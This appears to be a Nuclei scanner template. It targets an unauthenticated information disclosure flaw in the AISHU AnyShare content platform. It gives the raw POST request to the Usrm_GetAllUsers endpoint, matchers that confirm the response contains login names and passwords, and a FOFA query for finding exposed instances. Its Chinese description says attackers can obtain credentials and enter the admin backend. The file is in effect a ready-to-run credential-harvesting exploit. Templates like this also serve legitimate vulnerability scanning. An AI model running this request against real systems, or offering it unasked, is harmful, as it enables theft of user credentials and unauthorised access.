http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"loginName": "'
            - '"password": "'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

          [1,100]
id: aishu-AnyShare-Usrm_GetAllUsers-Information-disclosure
info:
    author: Superhero
    description: |-
        fofa: app="AISHU-AnyShare"
        爱数 AnyShare智能内容管理平台 Usrm_GetAllUsers 接口存在信息泄露漏洞，未经身份认证的攻击者可获取用户名密码等敏感信息。可登录后台，使系统处于极不安全状态。
    name: 爱数 AnyShare智能内容管理平台 Usrm_GetAllUsers 信息泄露漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489313&idx=1&sn=f94dec483cf1e77d65c6c3d414b80550&chksm=c267a212f5102b04610149b3219e6767e20526742e0bf95e34e4711ed7dbf5a31355c1cf4bf8&token=1884652675&lang=zh_CN#rd
    severity: medium
    tags:
        - Information disclosure
